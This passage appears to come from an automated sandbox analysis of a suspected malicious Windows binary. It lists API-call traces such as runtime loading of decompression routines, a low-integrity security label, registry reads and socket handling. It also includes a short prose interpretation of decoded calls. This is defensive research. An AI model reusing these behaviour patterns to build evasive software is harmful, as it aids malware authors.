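Run as a script it prints one row per call. The RegGetValueW line becomes RegGetValueW(HKEY_CURRENT_USER, ?, -0x8688, RRF_RT_REG_BINARY, 0x0, 0x0, 0x0); together with the SOFTWARE\%s format string, the LocalAlloc between the two calls and the second identical RegGetValueW, that is consistent with a size-then-read of a binary value under an HKCU\SOFTWARE subkey. The "?" stays a "?" because the sandbox did not recover that pointer, and the negative value is printed as the plugin gave it rather than interpreted. In the same way setsockopt(0x0, SOL_SOCKET, SO_KEEPALIVE, 0x1, 0x4) and CreateThread(..., CREATE_SUSPENDED, ...) followed by ResumeThread read directly off the page without a header lookup.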
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 007CFA3E
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007CFA61
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Module$FileHandleName
                                                                            • String ID: KERNEL32.DLL$USER32.DLL
                                                                            • API String ID: 4146042529-2880226457
                                                                            • Opcode ID: 5f6b62c3520ae90988879504e1c5570965f7819e6fd4c0bc741cb479d668d63f
                                                                            • Instruction ID: 5a26c832bab98d987a7ae00b9441ba0f54fdcbce904aefcc38c317abe86e13e7
                                                                            • Opcode Fuzzy Hash: 5f6b62c3520ae90988879504e1c5570965f7819e6fd4c0bc741cb479d668d63f
                                                                            • Instruction Fuzzy Hash: F7014471B45219EBD710EB708C48FBDB7B5A719704F1084BCE90ED2140E7BC8A84DA65
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL,007FA5D0,00000008,007E8199,00000000,00000000,?,?,007E72E3,007E46A2,?,?,007C5B93,?), ref: 007E80A2
                                                                            • __lock.LIBCMT ref: 007E80D6
                                                                              • Part of subcall function 007EC725: __mtinitlocknum.LIBCMT ref: 007EC73B
                                                                              • Part of subcall function 007EC725: __amsg_exit.LIBCMT ref: 007EC747
                                                                              • Part of subcall function 007EC725: EnterCriticalSection.KERNEL32(007C5B93,007C5B93,?,007E80DB,0000000D,?,?,007E72E3,007E46A2,?,?,007C5B93,?), ref: 007EC74F
                                                                            • InterlockedIncrement.KERNEL32(888D8B31), ref: 007E80E3
                                                                            • __lock.LIBCMT ref: 007E80F7
                                                                            • ___addlocaleref.LIBCMT ref: 007E8115
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                            • String ID: KERNEL32.DLL
                                                                            • API String ID: 637971194-2576044830
                                                                            • Opcode ID: 374e3c375280705b52b0bdcbbc8f86f4a43ce7a976f4ce9d1a0d9aac057b2bde
                                                                            • Instruction ID: 8a29d9fcc77360a1d1b8e8d28748e7fa5c494cfe86ffa08a1ee4fa2982f48f8f
                                                                            • Opcode Fuzzy Hash: 374e3c375280705b52b0bdcbbc8f86f4a43ce7a976f4ce9d1a0d9aac057b2bde
                                                                            • Instruction Fuzzy Hash: 2501A1B1506748EED7209F66D80931AFBF0EF44320F10890EE5D9533A0CBB8A945CB16
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(ntdll.dll), ref: 007C602B
                                                                            • GetProcAddress.KERNEL32(?,RtlNtStatusToDosError), ref: 007C603D
                                                                            • GetProcAddress.KERNEL32(?,RtlSetLastWin32Error), ref: 007C6051
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                                                            • API String ID: 667068680-2897241497
                                                                            • Opcode ID: 800a1bcddb89a1fdc8bf3a56971b3e4a3da765238bf1f8f320203a73c0fe8a37
                                                                            • Instruction ID: 41045d706ae9f6976a250f624c4b2c2a87329acd5786c0e080e2746318c5216f
                                                                            • Opcode Fuzzy Hash: 800a1bcddb89a1fdc8bf3a56971b3e4a3da765238bf1f8f320203a73c0fe8a37
                                                                            • Instruction Fuzzy Hash: 9BF0FFF5511208EFCB249FA0EC8EF79B774F784321F10895DA901622A1DB7949C1DF51
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,?,?,007DBC23), ref: 007C6859
                                                                            • GetProcAddress.KERNEL32(007DBC23,RtlDecompressBuffer), ref: 007C686B
                                                                            • GetProcAddress.KERNEL32(007DBC23,RtlGetCompressionWorkSpaceSize), ref: 007C687F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: NTDLL.DLL$RtlDecompressBuffer$RtlGetCompressionWorkSpaceSize
                                                                            • API String ID: 667068680-1459209654
                                                                            • Opcode ID: 17a6cc2fe5c7ee6b0b03db8ffd4f3c30f10539760c417f2a010b30d51e4b4c72
                                                                            • Instruction ID: 32161cb0dfa2511bd4bbd2d255f21b0bf0e4266b0a2ea733b4cca83e70e71edc
                                                                            • Opcode Fuzzy Hash: 17a6cc2fe5c7ee6b0b03db8ffd4f3c30f10539760c417f2a010b30d51e4b4c72
                                                                            • Instruction Fuzzy Hash: 6FF08275519308EFDF14CBA4EC0AB79B7B4F744311F00499EA900922A2D77D8D81DB51
                                                                            APIs
                                                                            • __CreateFrameInfo.LIBCMT ref: 007E768D
                                                                              • Part of subcall function 007E39A8: __getptd.LIBCMT ref: 007E39B6
                                                                              • Part of subcall function 007E39A8: __getptd.LIBCMT ref: 007E39C4
                                                                            • __getptd.LIBCMT ref: 007E7697
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __getptd.LIBCMT ref: 007E76A5
                                                                            • __getptd.LIBCMT ref: 007E76B3
                                                                            • __getptd.LIBCMT ref: 007E76BE
                                                                            • _CallCatchBlock2.LIBCMT ref: 007E76E4
                                                                              • Part of subcall function 007E3A4D: __CallSettingFrame@12.LIBCMT ref: 007E3A99
                                                                              • Part of subcall function 007E778B: __getptd.LIBCMT ref: 007E779A
                                                                              • Part of subcall function 007E778B: __getptd.LIBCMT ref: 007E77A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                            • String ID:
                                                                            • API String ID: 1602911419-0
                                                                            • Opcode ID: 268bc153346f674cebeeed6a4c0aa1eae2703ea6438f0b4cd12614e87e32691e
                                                                            • Instruction ID: 7a41e3480dfc47cc66fdac051f608149b4ff22121b32a2de4741366f93873cbc
                                                                            • Opcode Fuzzy Hash: 268bc153346f674cebeeed6a4c0aa1eae2703ea6438f0b4cd12614e87e32691e
                                                                            • Instruction Fuzzy Hash: CF1107B1C05349EFDB00EFA5C849AAE7BB1FF08310F108069F864A7351DB389A119F51
                                                                            APIs
                                                                            • __getptd.LIBCMT ref: 007E8B66
                                                                              • Part of subcall function 007E81BE: __getptd_noexit.LIBCMT ref: 007E81C1
                                                                              • Part of subcall function 007E81BE: __amsg_exit.LIBCMT ref: 007E81CE
                                                                            • __amsg_exit.LIBCMT ref: 007E8B86
                                                                            • __lock.LIBCMT ref: 007E8B96
                                                                            • InterlockedDecrement.KERNEL32(?), ref: 007E8BB3
                                                                            • _free.LIBCMT ref: 007E8BC6
                                                                            • InterlockedIncrement.KERNEL32(024B1688), ref: 007E8BDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                            • String ID:
                                                                            • API String ID: 3470314060-0
                                                                            • Opcode ID: ab6229d9f2fbb6bb8f6f4f44497f9e0bf8fe62d3734c7325bb8c8d20d6d878cf
                                                                            • Instruction ID: 93e5a94d8c87a54437b6d1b8d624682903fbc99a4b012af577204fd9b83cc986
                                                                            • Opcode Fuzzy Hash: ab6229d9f2fbb6bb8f6f4f44497f9e0bf8fe62d3734c7325bb8c8d20d6d878cf
                                                                            • Instruction Fuzzy Hash: C8019BF2903795D7D795AB669849B5E7B60BF4C720F084005E444A7291DF3C9C41CBD7
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C9164
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C919C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C91D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C9222
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C928C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: fa3d63cbbfcf4ec25e746f5555b244587585ab14c6331ed591d524b921192b1c
                                                                            • Instruction ID: 9ace37559eceae54137e8ea3e946afe1c18b6c4a6fede3279e43eca7b17029fc
                                                                            • Opcode Fuzzy Hash: fa3d63cbbfcf4ec25e746f5555b244587585ab14c6331ed591d524b921192b1c
                                                                            • Instruction Fuzzy Hash: C8313C716009199BFB18CF88C5D9B7EB772FBD0309F14826CD1166FA95C639AA81CB41
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C702F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C7073
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C70B5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C7117
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C71A5
                                                                            • shutdown.WS2_32(?,00000002), ref: 007C723B
                                                                            • closesocket.WS2_32(?), ref: 007C7245
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWaitclosesocketshutdown
                                                                            • String ID: d
                                                                            • API String ID: 1024630845-2564639436
                                                                            • Opcode ID: 7afec02a62797f5802358642953a27d801382d607906bda5a7073fdf26fe6865
                                                                            • Instruction ID: ad53c287f8dad2e29b4d2661cee6b208a0c05ba73bc37f9bcdb171fd93fa01e9
                                                                            • Opcode Fuzzy Hash: 7afec02a62797f5802358642953a27d801382d607906bda5a7073fdf26fe6865
                                                                            • Instruction Fuzzy Hash: 4241AB71A005248FFB28CE28C895F69B772FBD0309F1482EDD01EAE596C635AD95CF40
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C9164
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C919C
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C91D2
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C9222
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C928C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 58cbe6a7572e185d70088003296577ac30a6125c10305e641db2ca712b981e8d
                                                                            • Instruction ID: 87ebdbce18e785746d08494790fe1f27f1ac6f4376ee49bcf3274626272bc5b4
                                                                            • Opcode Fuzzy Hash: 58cbe6a7572e185d70088003296577ac30a6125c10305e641db2ca712b981e8d
                                                                            • Instruction Fuzzy Hash: 67311C716009199BFB28CE88C6D9A7EB772FBD0309F148268D1176FA95C635E941CB41
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C702F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C7073
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C70B5
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C7117
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C71A5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 22f991c7b5ea60d8d27b83e003eb7ac452284132aa267eda052ddad22e59fd22
                                                                            • Instruction ID: bb1142c6f078cdbf3436e4025a5ba86c05667823e26b04d31dcc22a26aa35498
                                                                            • Opcode Fuzzy Hash: 22f991c7b5ea60d8d27b83e003eb7ac452284132aa267eda052ddad22e59fd22
                                                                            • Instruction Fuzzy Hash: BC318871A105248BFB38CA28C899F69B776FBD0309F0482E9D01EAE596C635AD95CF50
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000), ref: 007C6932
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007C696A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C6987
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C69D7
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007C6A95
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventFreeObjectSingleVirtualWait
                                                                            • String ID: d
                                                                            • API String ID: 971639600-2564639436
                                                                            • Opcode ID: 5d8cb82c86ae98a4bf5f65ec907d9f8dec5c09bd192879ee2d7ac88ffcc6019f
                                                                            • Instruction ID: 1e887e71bbe4a3bcda22273055f325cd321fcff3b3742750073762cf6daab9d7
                                                                            • Opcode Fuzzy Hash: 5d8cb82c86ae98a4bf5f65ec907d9f8dec5c09bd192879ee2d7ac88ffcc6019f
                                                                            • Instruction Fuzzy Hash: 1E31F071600914EBFB18CF88C6D9A6DBB76FBD0309F1482ACD0176F695C639EA81DB40
                                                                            APIs
                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NW;;;LW),00000001,00000000,00000000), ref: 007DC456
                                                                            • GetSecurityDescriptorSacl.ADVAPI32(00000000,00000000,00000000,00000000), ref: 007DC470
                                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 007DC48C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007DC499
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
                                                                            • String ID: S:(ML;;NW;;;LW)
                                                                            • API String ID: 173816248-495562761
                                                                            • Opcode ID: b68721796555182cc9bc1485c29e92af5a27c7ab9d9196c27f03d5337080d1c5
                                                                            • Instruction ID: a6762b69fd0394edc5db5ef9e722741ecd4669f21c8066e326377dadcf3fa015
                                                                            • Opcode Fuzzy Hash: b68721796555182cc9bc1485c29e92af5a27c7ab9d9196c27f03d5337080d1c5
                                                                            • Instruction Fuzzy Hash: 4C010071A40309ABEB14CF90DC55FEE7779AB44700F104549FA05AA2C0D7B59604CF65
                                                                            APIs
                                                                            • ___BuildCatchObject.LIBCMT ref: 007E7A25
                                                                              • Part of subcall function 007E7980: ___BuildCatchObjectHelper.LIBCMT ref: 007E79B6
                                                                            • _UnwindNestedFrames.LIBCMT ref: 007E7A3C
                                                                            • ___FrameUnwindToState.LIBCMT ref: 007E7A4A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                            • String ID: csm$csm
                                                                            • API String ID: 2163707966-3733052814
